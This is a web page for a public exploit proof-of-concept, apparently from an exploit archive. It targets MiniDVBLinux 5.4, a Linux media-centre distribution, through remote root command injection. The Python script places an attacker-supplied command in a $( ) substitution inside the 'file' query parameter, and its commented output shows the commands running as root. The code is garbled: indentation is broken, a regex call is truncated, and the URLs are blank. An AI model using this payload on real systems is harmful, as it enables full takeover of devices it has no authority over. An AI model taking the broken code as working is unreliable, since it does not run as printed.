MiniDVBLinux 5.4 Exploit, Remote Root Command Injection

# Exploit Title: MiniDVBLinux 5.4  - Remote Root Command Injection
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability
# Vendor: MiniDVBLinux
# Product web page:
# Affected version: <=5.4
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
# Desc: The application suffers from an OS command injection vulnerability.
# This can be exploited to execute arbitrary commands with root privileges.
# Tested on: MiniDVBLinux 5.4
#            BusyBox v1.25.1
#            Architecture: armhf, armhf-rpi2
#            GNU/Linux (armv7l)
#            VideoDiskRecorder 2.4.6
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
# Advisory ID: ZSL-2022-5717
# Advisory URL:
# 24.09.2022

import requests
import re,sys

#test case 001
#test case 004
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory
#test case 005
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory

if len(sys.argv) < 3:
  print('MiniDVBLinux 5.4 Command Injection PoC')
  print('Usage: ./ [url] [cmd]')
    url = sys.argv[1]
    cmd = sys.argv[2]

req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')
outz ='<pre>(.*?)</pre>',req.text,flags=re.S).group()

All rights reserved 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD